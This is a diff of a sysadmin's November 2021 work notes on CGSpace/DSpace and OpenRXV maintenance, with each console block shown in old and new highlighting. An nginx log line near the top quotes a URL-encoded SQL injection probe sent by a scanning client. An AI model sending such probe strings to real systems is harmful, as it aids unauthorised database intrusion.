<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">91.213.50.11 - - [03/Nov/2021:06:47:20 +0100] &#34;HEAD /bitstream/handle/10568/106239/U19ArtSimonikovaChromosomeInthomNodev.pdf?sequence=1%60%20WHERE%206158%3D6158%20AND%204894%3D4741--%20kIlq&amp;isAllowed=y HTTP/1.1&#34; 200 0 &#34;https://cgspace.cgiar.org:443/bitstream/handle/10568/106239/U19ArtSimonikovaChromosomeInthomNodev.pdf&#34; &#34;Mozilla/5.0 (X11; U; Linux i686; en-CA; rv:1.8.0.10) Gecko/20070223 Fedora/1.5.0.10-1.fc5 Firefox/1.5.0.10&#34;
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>91.213.50.11 - - [03/Nov/2021:06:47:20 +0100] &#34;HEAD /bitstream/handle/10568/106239/U19ArtSimonikovaChromosomeInthomNodev.pdf?sequence=1%60%20WHERE%206158%3D6158%20AND%204894%3D4741--%20kIlq&amp;isAllowed=y HTTP/1.1&#34; 200 0 &#34;https://cgspace.cgiar.org:443/bitstream/handle/10568/106239/U19ArtSimonikovaChromosomeInthomNodev.pdf&#34; &#34;Mozilla/5.0 (X11; U; Linux i686; en-CA; rv:1.8.0.10) Gecko/20070223 Fedora/1.5.0.10-1.fc5 Firefox/1.5.0.10&#34;
</span></span></code></pre></div><ul>
<li>Another is in China, and they grabbed 1,200 PDFs from the REST API in under an hour:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console"># zgrep 222.129.53.160 /var/log/nginx/rest.log.2.gz | wc -l
1178
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span># zgrep 222.129.53.160 /var/log/nginx/rest.log.2.gz | wc -l
</span></span><span style="display:flex;"><span>1178
</span></span></code></pre></div><ul>
<li>I will continue to split the Solr statistics back into year-shards on DSpace Test (linode26)
<ul>
<li>Today I did all 2018 stats&hellip;</li>
@ -183,9 +183,9 @@ $ ./run.sh -s http://localhost:8081/solr/statistics-2019 -a import -o statistics
<ul>
<li>Update all Docker containers on AReS and rebuild OpenRXV:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ docker images | grep -v ^REPO | sed <span style="color:#e6db74">&#39;s/ \+/:/g&#39;</span> | cut -d: -f1,2 | xargs -L1 docker pull
$ docker-compose build
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ docker images | grep -v ^REPO | sed <span style="color:#e6db74">&#39;s/ \+/:/g&#39;</span> | cut -d: -f1,2 | xargs -L1 docker pull
</span></span><span style="display:flex;"><span>$ docker-compose build
</span></span></code></pre></div><ul>
<li>Then restart the server and start a fresh harvest</li>
<li>Continue splitting the Solr statistics into yearly shards on DSpace Test (doing 2017, 2016, 2015, and 2014 today)</li>
<li>Several users wrote to me last week to say that workflow emails haven&rsquo;t been working since 2021-10-21 or so
@ -194,33 +194,33 @@ $ docker-compose build
</ul>
</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ dspace test-email
<span style="color:#960050;background-color:#1e0010">
</span><span style="color:#960050;background-color:#1e0010"></span>About to send test email:
- To: fuuuu
- Subject: DSpace test email
- Server: smtp.office365.com
<span style="color:#960050;background-color:#1e0010">
</span><span style="color:#960050;background-color:#1e0010"></span>Error sending email:
- Error: javax.mail.SendFailedException: Send failure (javax.mail.AuthenticationFailedException: 535 5.7.139 Authentication unsuccessful, the user credentials were incorrect. [AM5PR0701CA0005.eurprd07.prod.outlook.com]
)
<span style="color:#960050;background-color:#1e0010">
</span><span style="color:#960050;background-color:#1e0010"></span>Please see the DSpace documentation for assistance.
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ dspace test-email
</span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010">
</span></span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010"></span>About to send test email:
</span></span><span style="display:flex;"><span> - To: fuuuu
</span></span><span style="display:flex;"><span> - Subject: DSpace test email
</span></span><span style="display:flex;"><span> - Server: smtp.office365.com
</span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010">
</span></span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010"></span>Error sending email:
</span></span><span style="display:flex;"><span> - Error: javax.mail.SendFailedException: Send failure (javax.mail.AuthenticationFailedException: 535 5.7.139 Authentication unsuccessful, the user credentials were incorrect. [AM5PR0701CA0005.eurprd07.prod.outlook.com]
</span></span><span style="display:flex;"><span>)
</span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010">
</span></span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010"></span>Please see the DSpace documentation for assistance.
</span></span></code></pre></div><ul>
<li>I sent a message to ILRI ICT to ask them to check the account/password</li>
<li>I want to do one last test of the Elasticsearch updates on OpenRXV so I got a snapshot of the latest Elasticsearch volume used on the production AReS instance:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console"># tar czf openrxv_esData_7.tar.xz /var/lib/docker/volumes/openrxv_esData_7
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span># tar czf openrxv_esData_7.tar.xz /var/lib/docker/volumes/openrxv_esData_7
</span></span></code></pre></div><ul>
<li>Then on my local server:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ mv ~/.local/share/containers/storage/volumes/openrxv_esData_7/ ~/.local/share/containers/storage/volumes/openrxv_esData_7.2021-11-07.bak
$ tar xf /tmp/openrxv_esData_7.tar.xz -C ~/.local/share/containers/storage/volumes --strip-components<span style="color:#f92672">=</span><span style="color:#ae81ff">4</span>
$ find ~/.local/share/containers/storage/volumes/openrxv_esData_7 -type f -exec chmod <span style="color:#ae81ff">660</span> <span style="color:#f92672">{}</span> <span style="color:#ae81ff">\;</span>
$ find ~/.local/share/containers/storage/volumes/openrxv_esData_7 -type d -exec chmod <span style="color:#ae81ff">770</span> <span style="color:#f92672">{}</span> <span style="color:#ae81ff">\;</span>
# copy backend/data to /tmp <span style="color:#66d9ef">for</span> the repository setup/layout
$ rsync -av --partial --progress --delete provisioning@ares:/tmp/data/ backend/data
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ mv ~/.local/share/containers/storage/volumes/openrxv_esData_7/ ~/.local/share/containers/storage/volumes/openrxv_esData_7.2021-11-07.bak
</span></span><span style="display:flex;"><span>$ tar xf /tmp/openrxv_esData_7.tar.xz -C ~/.local/share/containers/storage/volumes --strip-components<span style="color:#f92672">=</span><span style="color:#ae81ff">4</span>
</span></span><span style="display:flex;"><span>$ find ~/.local/share/containers/storage/volumes/openrxv_esData_7 -type f -exec chmod <span style="color:#ae81ff">660</span> <span style="color:#f92672">{}</span> <span style="color:#ae81ff">\;</span>
</span></span><span style="display:flex;"><span>$ find ~/.local/share/containers/storage/volumes/openrxv_esData_7 -type d -exec chmod <span style="color:#ae81ff">770</span> <span style="color:#f92672">{}</span> <span style="color:#ae81ff">\;</span>
</span></span><span style="display:flex;"><span># copy backend/data to /tmp <span style="color:#66d9ef">for</span> the repository setup/layout
</span></span><span style="display:flex;"><span>$ rsync -av --partial --progress --delete provisioning@ares:/tmp/data/ backend/data
</span></span></code></pre></div><ul>
<li>This seems to work: all items, stats, and repository setup/layout are OK</li>
<li>I merged my <a href="https://github.com/ilri/OpenRXV/pull/126">Elasticsearch pull request</a> from last month into OpenRXV</li>
</ul>
@ -245,21 +245,21 @@ $ rsync -av --partial --progress --delete provisioning@ares:/tmp/data/ backend/d
</ul>
</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">RuntimeError
<span style="color:#960050;background-color:#1e0010">
</span><span style="color:#960050;background-color:#1e0010"></span>Unable to find installation candidates for regex (2021.11.9)
<span style="color:#960050;background-color:#1e0010">
</span><span style="color:#960050;background-color:#1e0010"></span>at /usr/lib/python3.9/site-packages/poetry/installation/chooser.py:72 in choose_for
68│
69│ links.append(link)
70│
71│ if not links:
→ 72│ raise RuntimeError(
73│ &#34;Unable to find installation candidates for {}&#34;.format(package)
74│ )
75│
76│ # Get the best link
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>RuntimeError
</span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010">
</span></span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010"></span>Unable to find installation candidates for regex (2021.11.9)
</span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010">
</span></span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010"></span>at /usr/lib/python3.9/site-packages/poetry/installation/chooser.py:72 in choose_for
</span></span><span style="display:flex;"><span> 68│
</span></span><span style="display:flex;"><span> 69│ links.append(link)
</span></span><span style="display:flex;"><span> 70│
</span></span><span style="display:flex;"><span> 71│ if not links:
</span></span><span style="display:flex;"><span> → 72│ raise RuntimeError(
</span></span><span style="display:flex;"><span> 73│ &#34;Unable to find installation candidates for {}&#34;.format(package)
</span></span><span style="display:flex;"><span> 74│ )
</span></span><span style="display:flex;"><span> 75│
</span></span><span style="display:flex;"><span> 76│ # Get the best link
</span></span></code></pre></div><ul>
<li>So that&rsquo;s super annoying&hellip; I&rsquo;m going to try using Pipenv again&hellip;</li>
</ul>
<h2 id="2021-11-10">2021-11-10</h2>
@ -280,16 +280,16 @@ $ rsync -av --partial --progress --delete provisioning@ares:/tmp/data/ backend/d
</ul>
</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ docker-compose down
$ sudo tar czf openrxv_esData_7-2021-11-14.tar.xz /var/lib/docker/volumes/openrxv_esData_7
$ cp -a backend/data backend/data.2021-11-14
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ docker-compose down
</span></span><span style="display:flex;"><span>$ sudo tar czf openrxv_esData_7-2021-11-14.tar.xz /var/lib/docker/volumes/openrxv_esData_7
</span></span><span style="display:flex;"><span>$ cp -a backend/data backend/data.2021-11-14
</span></span></code></pre></div><ul>
<li>Then I checked out the latest git commit, updated all images, rebuilt the project:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ docker images | grep -v ^REPO | sed <span style="color:#e6db74">&#39;s/ \+/:/g&#39;</span> | cut -d: -f1,2 | xargs -L1 docker pull
$ docker-compose build
$ docker-compose up -d
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ docker images | grep -v ^REPO | sed <span style="color:#e6db74">&#39;s/ \+/:/g&#39;</span> | cut -d: -f1,2 | xargs -L1 docker pull
</span></span><span style="display:flex;"><span>$ docker-compose build
</span></span><span style="display:flex;"><span>$ docker-compose up -d
</span></span></code></pre></div><ul>
<li>Then I updated the repository configurations and started a fresh harvest</li>
<li>Help Francesca from the Alliance with a question about embargos on CGSpace items
<ul>
@ -315,11 +315,11 @@ $ docker-compose up -d
</ul>
</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ ./ilri/check-spider-ip-hits.sh -f /tmp/ips -p
Purging 10893 hits from 87.203.87.141 in statistics
<span style="color:#960050;background-color:#1e0010">
</span><span style="color:#960050;background-color:#1e0010"></span>Total number of bot hits purged: 10893
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ ./ilri/check-spider-ip-hits.sh -f /tmp/ips -p
</span></span><span style="display:flex;"><span>Purging 10893 hits from 87.203.87.141 in statistics
</span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010">
</span></span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010"></span>Total number of bot hits purged: 10893
</span></span></code></pre></div><ul>
<li>I did a bit more work documenting and tweaking the PostgreSQL configuration for CGSpace and DSpace Test in the Ansible infrastructure playbooks
<ul>
<li>I finally deployed the changes on both servers</li>
@ -344,8 +344,8 @@ Purging 10893 hits from 87.203.87.141 in statistics
</ul>
</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ vipsthumbnail AR<span style="color:#ae81ff">\ </span>RTB<span style="color:#ae81ff">\ </span>2020.pdf -s <span style="color:#ae81ff">600</span> -o <span style="color:#e6db74">&#39;%s.jpg[Q=85,optimize_coding,strip]&#39;</span>
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ vipsthumbnail AR<span style="color:#ae81ff">\ </span>RTB<span style="color:#ae81ff">\ </span>2020.pdf -s <span style="color:#ae81ff">600</span> -o <span style="color:#e6db74">&#39;%s.jpg[Q=85,optimize_coding,strip]&#39;</span>
</span></span></code></pre></div><ul>
<li>I sent an email to the OpenArchives.org contact to ask for help with the OAI validator
<ul>
<li>Someone responded to say that there have been a number of complaints about this on the oai-pmh mailing list recently&hellip;</li>
@ -365,20 +365,20 @@ Purging 10893 hits from 87.203.87.141 in statistics
</ul>
</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ ./ilri/check-spider-ip-hits.sh -f /tmp/ips.txt
Found 8352 hits from 138.201.49.199 in statistics
Found 9374 hits from 78.46.89.18 in statistics
Found 2112 hits from 93.179.69.74 in statistics
Found 1 hits from 31.6.77.23 in statistics
Found 5 hits from 34.209.213.122 in statistics
Found 86772 hits from 163.172.68.99 in statistics
Found 77 hits from 163.172.70.248 in statistics
Found 15842 hits from 163.172.71.24 in statistics
Found 172954 hits from 104.154.216.0 in statistics
Found 3 hits from 188.134.31.88 in statistics
<span style="color:#960050;background-color:#1e0010">
</span><span style="color:#960050;background-color:#1e0010"></span>Total number of hits from bots: 295492
</code></pre></div><h2 id="2021-11-27">2021-11-27</h2>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ ./ilri/check-spider-ip-hits.sh -f /tmp/ips.txt
</span></span><span style="display:flex;"><span>Found 8352 hits from 138.201.49.199 in statistics
</span></span><span style="display:flex;"><span>Found 9374 hits from 78.46.89.18 in statistics
</span></span><span style="display:flex;"><span>Found 2112 hits from 93.179.69.74 in statistics
</span></span><span style="display:flex;"><span>Found 1 hits from 31.6.77.23 in statistics
</span></span><span style="display:flex;"><span>Found 5 hits from 34.209.213.122 in statistics
</span></span><span style="display:flex;"><span>Found 86772 hits from 163.172.68.99 in statistics
</span></span><span style="display:flex;"><span>Found 77 hits from 163.172.70.248 in statistics
</span></span><span style="display:flex;"><span>Found 15842 hits from 163.172.71.24 in statistics
</span></span><span style="display:flex;"><span>Found 172954 hits from 104.154.216.0 in statistics
</span></span><span style="display:flex;"><span>Found 3 hits from 188.134.31.88 in statistics
</span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010">
</span></span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010"></span>Total number of hits from bots: 295492
</span></span></code></pre></div><h2 id="2021-11-27">2021-11-27</h2>
<ul>
<li>Peter sent me corrections for the authors that I had sent him back in 2021-09
<ul>
@ -387,16 +387,16 @@ Found 3 hits from 188.134.31.88 in statistics
</ul>
</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ ./ilri/fix-metadata-values.py -i /tmp/authors.csv -db dspace -u dspace -p <span style="color:#e6db74">&#39;fuuu&#39;</span> -f dc.contributor.author -t <span style="color:#e6db74">&#39;correct&#39;</span> -m <span style="color:#ae81ff">3</span>
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ ./ilri/fix-metadata-values.py -i /tmp/authors.csv -db dspace -u dspace -p <span style="color:#e6db74">&#39;fuuu&#39;</span> -f dc.contributor.author -t <span style="color:#e6db74">&#39;correct&#39;</span> -m <span style="color:#ae81ff">3</span>
</span></span></code></pre></div><ul>
<li>Then I imported to CGSpace and started a full Discovery re-index:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ time chrt -b <span style="color:#ae81ff">0</span> ionice -c2 -n7 nice -n19 dspace index-discovery -b
<span style="color:#960050;background-color:#1e0010">
</span><span style="color:#960050;background-color:#1e0010"></span>real 272m43.818s
user 183m4.543s
sys 2m47.988
</code></pre></div><h2 id="2021-11-28">2021-11-28</h2>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ time chrt -b <span style="color:#ae81ff">0</span> ionice -c2 -n7 nice -n19 dspace index-discovery -b
</span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010">
</span></span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010"></span>real 272m43.818s
</span></span><span style="display:flex;"><span>user 183m4.543s
</span></span><span style="display:flex;"><span>sys 2m47.988
</span></span></code></pre></div><h2 id="2021-11-28">2021-11-28</h2>
<ul>
<li>Run system updates on AReS server (linode20) and update all Docker containers and reboot
<ul>
@ -405,12 +405,12 @@ sys 2m47.988
</li>
<li>I am experimenting with pinning npm version 7 on OpenRXV frontend because of these Angular errors:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">npm WARN EBADENGINE Unsupported engine {
npm WARN EBADENGINE package: &#39;@angular-devkit/architect@0.901.15&#39;,
npm WARN EBADENGINE required: { node: &#39;&gt;= 10.13.0&#39;, npm: &#39;^6.11.0 || ^7.5.6&#39;, yarn: &#39;&gt;= 1.13.0&#39; },
npm WARN EBADENGINE current: { node: &#39;v12.22.7&#39;, npm: &#39;8.1.3&#39; }
npm WARN EBADENGINE }
</code></pre></div><h2 id="2021-11-29">2021-11-29</h2>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>npm WARN EBADENGINE Unsupported engine {
</span></span><span style="display:flex;"><span>npm WARN EBADENGINE package: &#39;@angular-devkit/architect@0.901.15&#39;,
</span></span><span style="display:flex;"><span>npm WARN EBADENGINE required: { node: &#39;&gt;= 10.13.0&#39;, npm: &#39;^6.11.0 || ^7.5.6&#39;, yarn: &#39;&gt;= 1.13.0&#39; },
</span></span><span style="display:flex;"><span>npm WARN EBADENGINE current: { node: &#39;v12.22.7&#39;, npm: &#39;8.1.3&#39; }
</span></span><span style="display:flex;"><span>npm WARN EBADENGINE }
</span></span></code></pre></div><h2 id="2021-11-29">2021-11-29</h2>
<ul>
<li>Tezira reached out to me to say that submissions on CGSpace are taking forever</li>
<li>I see a definite increase in locks in the last few days:</li>
@ -419,24 +419,24 @@ npm WARN EBADENGINE }
<ul>
<li>The locks are all held by dspaceWeb (XMLUI):</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ psql -c <span style="color:#e6db74">&#34;SELECT application_name FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid&#34;</span> | sort | uniq -c | sort -n
1
1 ------------------
1 (1394 rows)
1 application_name
9 psql
1385 dspaceWeb
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ psql -c <span style="color:#e6db74">&#34;SELECT application_name FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid&#34;</span> | sort | uniq -c | sort -n
</span></span><span style="display:flex;"><span> 1
</span></span><span style="display:flex;"><span> 1 ------------------
</span></span><span style="display:flex;"><span> 1 (1394 rows)
</span></span><span style="display:flex;"><span> 1 application_name
</span></span><span style="display:flex;"><span> 9 psql
</span></span><span style="display:flex;"><span> 1385 dspaceWeb
</span></span></code></pre></div><ul>
<li>I restarted PostgreSQL and the locks dropped down:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ psql -c <span style="color:#e6db74">&#34;SELECT application_name FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid&#34;</span> | sort | uniq -c | sort -n
1
1 ------------------
1 (103 rows)
1 application_name
9 psql
94 dspaceWeb
</code></pre></div><h2 id="2021-11-30">2021-11-30</h2>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ psql -c <span style="color:#e6db74">&#34;SELECT application_name FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid&#34;</span> | sort | uniq -c | sort -n
</span></span><span style="display:flex;"><span> 1
</span></span><span style="display:flex;"><span> 1 ------------------
</span></span><span style="display:flex;"><span> 1 (103 rows)
</span></span><span style="display:flex;"><span> 1 application_name
</span></span><span style="display:flex;"><span> 9 psql
</span></span><span style="display:flex;"><span> 94 dspaceWeb
</span></span></code></pre></div><h2 id="2021-11-30">2021-11-30</h2>
<ul>
<li>IWMI sent me ORCID identifiers for some new staff
<ul>
@ -444,36 +444,36 @@ npm WARN EBADENGINE }
</ul>
</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ cat ~/src/git/DSpace/dspace/config/controlled-vocabularies/cg-creator-identifier.xml /tmp/iwmi-orcids.txt | grep -oE <span style="color:#e6db74">&#39;[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}&#39;</span> | sort | uniq &gt; /tmp/2021-11-30-combined-orcids.txt
$ wc -l /tmp/2021-11-30-combined-orcids.txt
1348 /tmp/2021-11-30-combined-orcids.txt
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ cat ~/src/git/DSpace/dspace/config/controlled-vocabularies/cg-creator-identifier.xml /tmp/iwmi-orcids.txt | grep -oE <span style="color:#e6db74">&#39;[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}&#39;</span> | sort | uniq &gt; /tmp/2021-11-30-combined-orcids.txt
</span></span><span style="display:flex;"><span>$ wc -l /tmp/2021-11-30-combined-orcids.txt
</span></span><span style="display:flex;"><span>1348 /tmp/2021-11-30-combined-orcids.txt
</span></span></code></pre></div><ul>
<li>After I combined them and removed duplicates, I resolved all the names using my <code>resolve-orcids.py</code> script:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ ./ilri/resolve-orcids.py -i /tmp/2021-11-30-combined-orcids.txt -o /tmp/2021-11-30-combined-orcids-names.txt
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ ./ilri/resolve-orcids.py -i /tmp/2021-11-30-combined-orcids.txt -o /tmp/2021-11-30-combined-orcids-names.txt
</span></span></code></pre></div><ul>
<li>Then I updated some ORCID identifiers that had changed in the XML:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ cat 2021-11-30-fix-orcids.csv
cg.creator.identifier,correct
&#34;ADEBOWALE AKANDE: 0000-0002-6521-3272&#34;,&#34;ADEBOWALE AD AKANDE: 0000-0002-6521-3272&#34;
&#34;Daniel Ortiz Gonzalo: 0000-0002-5517-1785&#34;,&#34;Daniel Ortiz-Gonzalo: 0000-0002-5517-1785&#34;
&#34;FRIDAY ANETOR: 0000-0003-3137-1958&#34;,&#34;Friday Osemenshan Anetor: 0000-0003-3137-1958&#34;
&#34;Sander Muilerman: 0000-0001-9103-3294&#34;,&#34;Sander Muilerman-Rodrigo: 0000-0001-9103-3294&#34;
$ ./ilri/fix-metadata-values.py -i 2021-11-30-fix-orcids.csv -db dspace -u dspace -p <span style="color:#e6db74">&#39;fuuu&#39;</span> -f cg.creator.identifier -t <span style="color:#e6db74">&#39;correct&#39;</span> -m <span style="color:#ae81ff">247</span>
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ cat 2021-11-30-fix-orcids.csv
</span></span><span style="display:flex;"><span>cg.creator.identifier,correct
</span></span><span style="display:flex;"><span>&#34;ADEBOWALE AKANDE: 0000-0002-6521-3272&#34;,&#34;ADEBOWALE AD AKANDE: 0000-0002-6521-3272&#34;
</span></span><span style="display:flex;"><span>&#34;Daniel Ortiz Gonzalo: 0000-0002-5517-1785&#34;,&#34;Daniel Ortiz-Gonzalo: 0000-0002-5517-1785&#34;
</span></span><span style="display:flex;"><span>&#34;FRIDAY ANETOR: 0000-0003-3137-1958&#34;,&#34;Friday Osemenshan Anetor: 0000-0003-3137-1958&#34;
</span></span><span style="display:flex;"><span>&#34;Sander Muilerman: 0000-0001-9103-3294&#34;,&#34;Sander Muilerman-Rodrigo: 0000-0001-9103-3294&#34;
</span></span><span style="display:flex;"><span>$ ./ilri/fix-metadata-values.py -i 2021-11-30-fix-orcids.csv -db dspace -u dspace -p <span style="color:#e6db74">&#39;fuuu&#39;</span> -f cg.creator.identifier -t <span style="color:#e6db74">&#39;correct&#39;</span> -m <span style="color:#ae81ff">247</span>
</span></span></code></pre></div><ul>
<li>Tag existing items from the IWMI&rsquo;s new authors with ORCID iDs using <code>add-orcid-identifiers-csv.py</code> (7 new metadata fields added):</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ cat 2021-11-30-add-orcids.csv
dc.contributor.author,cg.creator.identifier
&#34;Liaqat, U.W.&#34;,&#34;Umar Waqas Liaqat: 0000-0001-9027-5232&#34;
&#34;Liaqat, Umar Waqas&#34;,&#34;Umar Waqas Liaqat: 0000-0001-9027-5232&#34;
&#34;Munyaradzi, M.&#34;,&#34;Munyaradzi Junia Mutenje: 0000-0002-7829-9300&#34;
